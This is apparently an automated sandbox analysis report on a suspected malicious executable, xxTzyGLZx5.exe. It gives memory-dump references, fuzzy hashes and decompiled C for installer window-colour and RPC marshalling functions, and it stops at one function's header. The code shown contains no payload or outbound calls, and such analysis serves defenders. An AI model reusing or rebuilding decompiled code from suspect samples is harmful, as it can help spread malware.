                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Prev
                                                                                                • String ID: "C:\Users\user\Desktop\xxTzyGLZx5.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 589700163-1747928552
                                                                                                • Opcode ID: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                                                                                • Instruction ID: c1e19bc38f5928a16c8df4e3184f884ce5b3d56ade5c4132b49213cb44a1c68a
                                                                                                • Opcode Fuzzy Hash: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                                                                                • Instruction Fuzzy Hash: 41119351809B912DFB3216244C44B77BFA9CB96760F18447BE9D4622C2C6BCBC829B7D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00403D44, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00403D44(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                0x00403d56
                                                                                                0x00403dea
                                                                                                0x00000000
                                                                                                0x00403dea
                                                                                                0x00403d67
                                                                                                0x00403d6b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403d71
                                                                                                0x00403d7a
                                                                                                0x00403d7d
                                                                                                0x00403d7d
                                                                                                0x00403d83
                                                                                                0x00403d89
                                                                                                0x00403d89
                                                                                                0x00403d95
                                                                                                0x00403d9b
                                                                                                0x00403da2
                                                                                                0x00403da5
                                                                                                0x00403da8
                                                                                                0x00403daa
                                                                                                0x00403daa
                                                                                                0x00403db2
                                                                                                0x00403db8
                                                                                                0x00403db8
                                                                                                0x00403dc2
                                                                                                0x00403dc7
                                                                                                0x00403dca
                                                                                                0x00403dcf
                                                                                                0x00403dd2
                                                                                                0x00403dd2
                                                                                                0x00403de2
                                                                                                0x00403de2
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2320649405-0
                                                                                                • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                • Instruction ID: ac003594d1dcb8ae4d3b01263828f587cf1b0240a4208d46790e3dc2010cfdd8
                                                                                                • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                • Instruction Fuzzy Hash: 58218471904744ABC7219F78DD08B9B7FFCAF01715F048A29E895E22E0D739E904CB55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDADE30, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 319COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 63%
                                                                                                			E6EDADE30(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t158;

				_v24 = _a4 & 0x000000ff;
				_v24 = _v24 - 0x1b;
				if(_v24 > 0xa) {
					L26:
					_t158 = _a4 & 0x000000ff;
					0x6eda0000("unknown array format 0x%x\n", _t158);
					__imp__RpcRaiseException(0x6f7);
					return _t158;
				}
				_t7 = _v24 + 0x6edae1fc; // 0xcccccc03
				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M6EDAE1E8))) {
					case 0:
						_v12 =  *(_a12 + 2) & 0x0000ffff;
						_v5 = ( *(_a12 + (1 << 0)) & 0x000000ff) + 1;
						_a12 = E6EDAA440(_a8, _a12 + 4);
						_v16 = E6EDAAEC0(_v12,  *(_a8 + 0x3c));
						_v20 = _v16;
						 *(_a8 + 0x18) =  *(_a8 + 0x18) + _v16;
						E6EDA73D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
						if((_a16 & 0x000000ff) != 0) {
							 *(_a8 + 0x10) =  *(_a8 + 4);
						}
						_t171 = E6EDAAF00(_a8, _v20);
						if((_a16 & 0x000000ff) != 0) {
							_t171 = E6EDAC7E0(_a8, _a12);
						}
						return _t171;
					case 1:
						__edx = _a12;
						__eax =  *(__edx + 2) & 0x0000ffff;
						_v12 =  *(__edx + 2) & 0x0000ffff;
						1 = 1 << 0;
						__edx = _a12;
						 *(__edx + (1 << 0)) & 0x000000ff = ( *(__edx + (1 << 0)) & 0x000000ff) + 1;
						_v5 = __al;
						_a12 = _a12 + 4;
						__edx = _a8;
						_a12 = E6EDAA440(_a8, _a12 + 4);
						__eax = _a8;
						__ecx =  *(_a8 + 0x3c);
						__edx = _a12;
						__eax = _a8;
						_a12 = E6EDAA540( *(_a8 + 0x3c), _a8, _a12,  *(_a8 + 0x3c));
						__ecx = _a8;
						__edx =  *(_a8 + 0x44);
						__eax = _v12;
						_v20 = E6EDAAEC0(_v12,  *(_a8 + 0x44));
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _v12;
						_v16 = E6EDAAEC0(_v12,  *(_a8 + 0x3c));
						__ecx = _a8;
						 *(__ecx + 0x18) =  *(__ecx + 0x18) + _v16;
						__eax = _a8;
						 *(_a8 + 0x18) =  *(__ecx + 0x18) + _v16;
						__ecx = _v5 & 0x000000ff;
						_a8 = _a8 + 4;
						E6EDA73D0(_v5 & 0x000000ff, _a8 + 4, _v5 & 0x000000ff) = _a16 & 0x000000ff;
						if((_a16 & 0x000000ff) != 0) {
							__ecx = _a8;
							__edx = _a8;
							__eax =  *(__edx + 4);
							 *(_a8 + 0x10) =  *(__edx + 4);
						}
						__ecx = _v20;
						__edx = _a8;
						__eax = E6EDAAF00(_a8, _v20);
						__eax = _a16 & 0x000000ff;
						if(__eax != 0) {
							__ecx = _a12;
							__edx = _a8;
							__eax = E6EDAC7E0(_a8, _a12);
						}
						return __eax;
					case 2:
						1 = 1 << 0;
						__edx = _a12;
						 *(__edx + (1 << 0)) & 0x000000ff = ( *(__edx + (1 << 0)) & 0x000000ff) + 1;
						_v5 = __al;
						_a12 = _a12 + 4;
						__edx = _a8;
						_a12 = E6EDAA440(_a8, _a12 + 4);
						__eax = _a8;
						__ecx =  *(_a8 + 0x3c);
						__edx = _a12;
						__eax = _a8;
						_a12 = E6EDAA540( *(_a8 + 0x3c), _a8, _a12,  *(_a8 + 0x3c));
						__ecx = _v5 & 0x000000ff;
						_a8 = _a8 + 4;
						__eax = E6EDA73D0(_v5 & 0x000000ff, _a8 + 4, _v5 & 0x000000ff);
						__eax = _a8;
						__ecx =  *(__eax + 0x18);
						_v36 =  *(__eax + 0x18);
						__edx = _a12;
						_push(_a12);
						__eax = _a8;
						_push(__eax);
						0x6eda0000();
						__esp = __esp + 8;
						_v12 = __eax;
						__ecx = _v12;
						__edx = _a8;
						__eax =  *(_a8 + 0x3c);
						__eax = E6EDAAEC0( *(_a8 + 0x3c), _v12);
						_v16 = __eax;
						__ecx = _a8;
						__edx =  *(__ecx + 0x44);
						_v32 =  *(__ecx + 0x44);
						_v28 = 0;
						while(1) {
							__ecx = _v28;
							if(_v28 >= _v32) {
								break;
							}
							__edx = _a12;
							_a8 = E6EDA9BE0(_a8, _a12, 0);
							__eax = _v28;
							__eax = _v28 + 1;
							_v28 = __eax;
						}
						_v36 = _v36 + _v16;
						__edx = _a8;
						 *(_a8 + 0x18) = _v36 + _v16;
						return __eax;
					case 3:
						__eax = _a4 & 0x000000ff;
						if((_a4 & 0x000000ff) != 0x22) {
							_v12 = 2;
						} else {
							_v12 = 1;
						}
						__ecx = _a8;
						__edx =  *(__ecx + 0x3c);
						_a8 = E6EDAA540(__ecx, _a8, 0,  *(__ecx + 0x3c));
						1 = 1 << 0;
						__edx = _a12;
						__eax =  *(__edx + (1 << 0)) & 0x000000ff;
						if(( *(__edx + (1 << 0)) & 0x000000ff) != 0x44) {
							__ecx = _a8;
							__edx = _a8;
							__eax =  *(__ecx + 0x3c);
							if( *(__ecx + 0x3c) !=  *(_a8 + 0x44)) {
								__ecx = _a8;
								__edx =  *(__ecx + 0x3c);
								_push( *(__ecx + 0x3c));
								__eax = _a8;
								__ecx =  *(__eax + 0x44);
								_push( *(__eax + 0x44));
								_push("buffer size %d must equal memory size %ld for non-sized conformant strings\n");
								0x6eda0000();
								__esp = __esp + 0xc;
								_push(0x6c6);
								__imp__RpcRaiseException();
							}
						}
						__edx = _a8;
						if( *((intOrPtr*)(_a8 + 0x40)) != 0) {
							__eax = _a8;
							__ecx =  *(__eax + 0x40);
							_push( *(__eax + 0x40));
							_push("conformant strings can\'t have Offset (%d)\n");
							0x6eda0000();
							__esp = __esp + 8;
							_push(0x6c6);
							__imp__RpcRaiseException();
						}
						__edx = _a8;
						__eax =  *(_a8 + 0x3c);
						__ecx = _v12;
						_v16 = E6EDAAEC0(_v12,  *(_a8 + 0x3c));
						__edx = _a8;
						__eax =  *(_a8 + 0x44);
						__ecx = _v12;
						_v20 = E6EDAAEC0(_v12,  *(_a8 + 0x44));
						__edx = _v12;
						__eax = _v20;
						__ecx = _a8;
						__eax = E6EDAB0C0(_a8, _a8, _v20, _v12);
						__edx = _v20;
						_a8 = E6EDAAF00(_a8, _v20);
						__ecx = _a8;
						 *(__ecx + 0x18) =  *(__ecx + 0x18) + _v16;
						__eax = _a8;
						 *(__eax + 0x18) =  *(__ecx + 0x18) + _v16;
						return __eax;
					case 4:
						goto L26;
				}
			}












                                                                                                0x6edade3a
                                                                                                0x6edade43
                                                                                                0x6edade4a
                                                                                                0x6edae1c7
                                                                                                0x6edae1c7
                                                                                                0x6edae1d1
                                                                                                0x6edae1de
                                                                                                0x00000000
                                                                                                0x6edae1de
                                                                                                0x6edade53
                                                                                                0x6edade5a
                                                                                                0x00000000
                                                                                                0x6edade68
                                                                                                0x6edade7d
                                                                                                0x6edade93
                                                                                                0x6edadea9
                                                                                                0x6edadeaf
                                                                                                0x6edadebe
                                                                                                0x6edadecd
                                                                                                0x6edadedb
                                                                                                0x6edadee6
                                                                                                0x6edadee6
                                                                                                0x6edadef1
                                                                                                0x6edadeff
                                                                                                0x6edadf09
                                                                                                0x6edadf0e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edadf16
                                                                                                0x6edadf19
                                                                                                0x6edadf1d
                                                                                                0x6edadf25
                                                                                                0x6edadf28
                                                                                                0x6edadf2f
                                                                                                0x6edadf32
                                                                                                0x6edadf38
                                                                                                0x6edadf3c
                                                                                                0x6edadf48
                                                                                                0x6edadf4b
                                                                                                0x6edadf4e
                                                                                                0x6edadf52
                                                                                                0x6edadf56
                                                                                                0x6edadf62
                                                                                                0x6edadf65
                                                                                                0x6edadf68
                                                                                                0x6edadf6c
                                                                                                0x6edadf78
                                                                                                0x6edadf7b
                                                                                                0x6edadf7e
                                                                                                0x6edadf82
                                                                                                0x6edadf8e
                                                                                                0x6edadf91
                                                                                                0x6edadf97
                                                                                                0x6edadf9a
                                                                                                0x6edadf9d
                                                                                                0x6edadfa0
                                                                                                0x6edadfa8
                                                                                                0x6edadfb4
                                                                                                0x6edadfba
                                                                                                0x6edadfbc
                                                                                                0x6edadfbf
                                                                                                0x6edadfc2
                                                                                                0x6edadfc5
                                                                                                0x6edadfc5
                                                                                                0x6edadfc8
                                                                                                0x6edadfcc
                                                                                                0x6edadfd0
                                                                                                0x6edadfd8
                                                                                                0x6edadfde
                                                                                                0x6edadfe0
                                                                                                0x6edadfe4
                                                                                                0x6edadfe8
                                                                                                0x6edadfed
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edae0fc
                                                                                                0x6edae0ff
                                                                                                0x6edae106
                                                                                                0x6edae109
                                                                                                0x6edae10f
                                                                                                0x6edae113
                                                                                                0x6edae11f
                                                                                                0x6edae122
                                                                                                0x6edae125
                                                                                                0x6edae129
                                                                                                0x6edae12d
                                                                                                0x6edae139
                                                                                                0x6edae13c
                                                                                                0x6edae144
                                                                                                0x6edae148
                                                                                                0x6edae150
                                                                                                0x6edae153
                                                                                                0x6edae156
                                                                                                0x6edae159
                                                                                                0x6edae15c
                                                                                                0x6edae15d
                                                                                                0x6edae160
                                                                                                0x6edae161
                                                                                                0x6edae166
                                                                                                0x6edae169
                                                                                                0x6edae16c
                                                                                                0x6edae170
                                                                                                0x6edae173
                                                                                                0x6edae177
                                                                                                0x6edae17f
                                                                                                0x6edae182
                                                                                                0x6edae185
                                                                                                0x6edae188
                                                                                                0x6edae18b
                                                                                                0x6edae19d
                                                                                                0x6edae19d
                                                                                                0x6edae1a3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edae1a7
                                                                                                0x6edae1af
                                                                                                0x6edae194
                                                                                                0x6edae197
                                                                                                0x6edae19a
                                                                                                0x6edae19a
                                                                                                0x6edae1bc
                                                                                                0x6edae1bf
                                                                                                0x6edae1c2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edadff5
                                                                                                0x6edadffc
                                                                                                0x6edae007
                                                                                                0x6edadffe
                                                                                                0x6edadffe
                                                                                                0x6edadffe
                                                                                                0x6edae00e
                                                                                                0x6edae011
                                                                                                0x6edae01b
                                                                                                0x6edae028
                                                                                                0x6edae02b
                                                                                                0x6edae02e
                                                                                                0x6edae035
                                                                                                0x6edae037
                                                                                                0x6edae03a
                                                                                                0x6edae03d
                                                                                                0x6edae043
                                                                                                0x6edae045
                                                                                                0x6edae048
                                                                                                0x6edae04b
                                                                                                0x6edae04c
                                                                                                0x6edae04f
                                                                                                0x6edae052
                                                                                                0x6edae053
                                                                                                0x6edae058
                                                                                                0x6edae05d
                                                                                                0x6edae060
                                                                                                0x6edae065
                                                                                                0x6edae065
                                                                                                0x6edae043
                                                                                                0x6edae06b
                                                                                                0x6edae072
                                                                                                0x6edae074
                                                                                                0x6edae077
                                                                                                0x6edae07a
                                                                                                0x6edae07b
                                                                                                0x6edae080
                                                                                                0x6edae085
                                                                                                0x6edae088
                                                                                                0x6edae08d
                                                                                                0x6edae08d
                                                                                                0x6edae093
                                                                                                0x6edae096
                                                                                                0x6edae09a
                                                                                                0x6edae0a6
                                                                                                0x6edae0a9
                                                                                                0x6edae0ac
                                                                                                0x6edae0b0
                                                                                                0x6edae0bc
                                                                                                0x6edae0bf
                                                                                                0x6edae0c3
                                                                                                0x6edae0c7
                                                                                                0x6edae0cb
                                                                                                0x6edae0d3
                                                                                                0x6edae0db
                                                                                                0x6edae0e3
                                                                                                0x6edae0e9
                                                                                                0x6edae0ec
                                                                                                0x6edae0ef
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDAE065
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDAE08D
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDAE1DE
                                                                                                Strings
                                                                                                • buffer size %d must equal memory size %ld for non-sized conformant strings, xrefs: 6EDAE053
                                                                                                • unknown array format 0x%x, xrefs: 6EDAE1CC
                                                                                                • conformant strings can't have Offset (%d), xrefs: 6EDAE07B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: buffer size %d must equal memory size %ld for non-sized conformant strings$conformant strings can't have Offset (%d)$unknown array format 0x%x
                                                                                                • API String ID: 3997070919-1066441581
                                                                                                • Opcode ID: 9a6b46ecdba052145924c0dccbe1fa80a37ade88e291d5682352a5cceaedc133
                                                                                                • Instruction ID: 95a3f7e4d962e8803a35a50f50be68172203c4c6a1525b1e67172fbef6fd4f9e
                                                                                                • Opcode Fuzzy Hash: 9a6b46ecdba052145924c0dccbe1fa80a37ade88e291d5682352a5cceaedc133
                                                                                                • Instruction Fuzzy Hash: C8D15EB5A00109AFCB44CF98D890AAEBBB5BF88204F14C559FE199B341D335EB51CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA47D0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 175memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA47D0(void* __eflags, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v48;
				intOrPtr _t114;
				void* _t182;
				void* _t185;
				void* _t186;
				void* _t187;

				_v12 =  *(_a12 + (1 << 0)) & 0x000000ff;
				_v20 =  *(_a12 + (1 << 1)) & 0x0000ffff;
				_v16 =  *(_a12 + (1 << 2)) & 0x0000ffff;
				_v8 = 0;
				0x6eda0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				0x6eda0000("index=%d\n", _v20);
				_t130 = _a4;
				E6EDAE8C0(_a4, 2, _a12,  &_v48);
				_t185 = _t182 + 0x2c;
				if((_v12 & 0x000000c0) == 0) {
					E6EDA73D0(_a4 + 4, _a4 + 4, (_v12 & 0x0000000f) + 1);
					_t186 = _t185 + 8;
				} else {
					E6EDA73D0(_t130, _a4 + 4, 4);
					_t187 = _t185 + 8;
					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 4)) + 4;
					_t152 = _a4;
					if( *((intOrPtr*)(_a4 + 0x34)) != 0) {
						_v8 =  *((intOrPtr*)(_a4 + 4));
						 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
						_t152 = _a4;
						 *((intOrPtr*)(_a4 + 0x34)) = 0;
					}
					E6EDA73D0(_t152, _a4 + 4, 8);
					_t186 = _t187 + 8;
				}
				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
					_a16 = 1;
				}
				if((_a16 & 0x000000ff) != 0) {
					_t114 = _a4;
					__imp__NdrAllocate(_t114, _v16);
					 *_a8 = _t114;
					E6EDB0770( *_a8, 0, _v16);
					_t186 = _t186 + 0xc;
				}
				 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x60)) + 0x38)) + (_v20 << 4) + 8))))( &_v48,  *((intOrPtr*)(_a4 + 4)),  *_a8);
				if(_v8 != 0) {
					do {
						0x6eda0000("buffer=%d/%d\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)),  *((intOrPtr*)(_a4 + 0x14)));
						_t186 = _t186 + 0xc;
						if( *((intOrPtr*)(_a4 + 4)) >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
							0x6eda0000("buffer overflow %d bytes\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)));
							_t186 = _t186 + 8;
						}
					} while (0 != 0);
					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
					 *((intOrPtr*)(_a4 + 4)) = _v8;
				}
				return 0;
			}













                                                                                                0x6eda47e5
                                                                                                0x6eda47f6
                                                                                                0x6eda4808
                                                                                                0x6eda480b
                                                                                                0x6eda4828
                                                                                                0x6eda4839
                                                                                                0x6eda484b
                                                                                                0x6eda484f
                                                                                                0x6eda4854
                                                                                                0x6eda4860
                                                                                                0x6eda48ce
                                                                                                0x6eda48d3
                                                                                                0x6eda4862
                                                                                                0x6eda486b
                                                                                                0x6eda4870
                                                                                                0x6eda487f
                                                                                                0x6eda4882
                                                                                                0x6eda4889
                                                                                                0x6eda4891
                                                                                                0x6eda489d
                                                                                                0x6eda48a0
                                                                                                0x6eda48a3
                                                                                                0x6eda48a3
                                                                                                0x6eda48b3
                                                                                                0x6eda48b8
                                                                                                0x6eda48b8
                                                                                                0x6eda48dc
                                                                                                0x6eda48e6
                                                                                                0x6eda48e6
                                                                                                0x6eda48f0
                                                                                                0x6eda48f6
                                                                                                0x6eda48fa
                                                                                                0x6eda4903
                                                                                                0x6eda4911
                                                                                                0x6eda4916
                                                                                                0x6eda4916
                                                                                                0x6eda4942
                                                                                                0x6eda4949
                                                                                                0x6eda494b
                                                                                                0x6eda4966
                                                                                                0x6eda496b
                                                                                                0x6eda4982
                                                                                                0x6eda49a0
                                                                                                0x6eda49a5
                                                                                                0x6eda49a5
                                                                                                0x6eda49a8
                                                                                                0x6eda49b5
                                                                                                0x6eda49be
                                                                                                0x6eda49be
                                                                                                0x6eda49c6

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Allocate_memset
                                                                                                • String ID: (%p,%p,%p,%d)$buffer overflow %d bytes$buffer=%d/%d$index=%d
                                                                                                • API String ID: 3995017260-3620127348
                                                                                                • Opcode ID: 24aaffa088c19a37a352a82f26acf20333c093fb9209285fd6ad35df60578612
                                                                                                • Instruction ID: 8740b57dcb71fddf9500c68b5c1e2e6b67221fd8b4fb8edc63aa99e9de1f1027
                                                                                                • Opcode Fuzzy Hash: 24aaffa088c19a37a352a82f26acf20333c093fb9209285fd6ad35df60578612
                                                                                                • Instruction Fuzzy Hash: 9D710EB5A00208EFDB04CF58C890EAA7BB6FF88354F14C558E9599F345D731EA52CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA4DE0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 32%
                                                                                                			E6EDA4DE0(signed char* _a4, intOrPtr _a8, signed char* _a12) {
				signed char* _v8;
				signed char* _v12;
				signed int _v16;
				signed char* _t52;
				signed int _t63;
				signed int _t66;
				signed char* _t67;

				_v8 = _a12;
				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
				_a12 = _a12 + 6;
				if(( *_v8 & 0x000000ff) != 0x18 && ( *_v8 & 0x000000ff) != 0x17) {
					_t67 = _v8;
					0x6eda0000("invalid format type %x\n",  *_t67 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return _t67;
				}
				_v12 =  &(_v8[_v8[4] + 4]);
				__eflags = ( *_v12 & 0x000000ff) - 0x1b;
				if(__eflags != 0) {
					_t66 =  *_v8 & 0x000000ff;
					0x6eda0000("invalid array format type %x\n", _t66);
					__imp__RpcRaiseException(0x6e6);
					return _t66;
				}
				_v16 = _v12[2] & 0x0000ffff;
				_t52 = _a4;
				0x6eda0000(_t52, (_v8[2] & 0x0000ffff) + _a8,  &(_v12[4]), 0);
				_v12 = _t52;
				E6EDAA960(__eflags, _a4);
				E6EDA73B0( &(_a4[0x14]), (_v8[1] & 0x000000ff) + 1);
				0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
				E6EDAAF50(_a4, _v8[2] & 0x0000ffff);
				E6EDAAF50(_a4, E6EDAAEC0(_a4[0x3c], _v16));
				_t63 =  *_v8 & 0x000000ff;
				__eflags = _t63 - 0x18;
				if(_t63 == 0x18) {
					return E6EDAC570(_a4, _a8, _a12);
				}
				return _t63;
			}










                                                                                                0x6eda4de9
                                                                                                0x6eda4dfd
                                                                                                0x6eda4e0b
                                                                                                0x6eda4e17
                                                                                                0x6eda4e24
                                                                                                0x6eda4e30
                                                                                                0x6eda4e3d
                                                                                                0x00000000
                                                                                                0x6eda4e3d
                                                                                                0x6eda4e56
                                                                                                0x6eda4e5f
                                                                                                0x6eda4e62
                                                                                                0x6eda4e67
                                                                                                0x6eda4e70
                                                                                                0x6eda4e7d
                                                                                                0x00000000
                                                                                                0x6eda4e7d
                                                                                                0x6eda4e8f
                                                                                                0x6eda4ea6
                                                                                                0x6eda4eaa
                                                                                                0x6eda4eb2
                                                                                                0x6eda4eb9
                                                                                                0x6eda4ed3
                                                                                                0x6eda4ee8
                                                                                                0x6eda4efc
                                                                                                0x6eda4f1c
                                                                                                0x6eda4f27
                                                                                                0x6eda4f2a
                                                                                                0x6eda4f2d
                                                                                                0x00000000
                                                                                                0x6eda4f40
                                                                                                0x6eda4f46

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA4E3D
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA4E7D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid array format type %x$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-2774118540
                                                                                                • Opcode ID: fdb3555e783afd06f18b6c030c9642ad49379a3a8dd5320f563f0718df9167fa
                                                                                                • Instruction ID: 8092c8feda90abbae3c8890722dc1f7482dff57c5fa4bd904ad0295ba4a932e7
                                                                                                • Opcode Fuzzy Hash: fdb3555e783afd06f18b6c030c9642ad49379a3a8dd5320f563f0718df9167fa
                                                                                                • Instruction Fuzzy Hash: 2F4194B5A04104FBCB44CFD8D890DAEBBBAAF85205F148588F9499B341E731EF51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
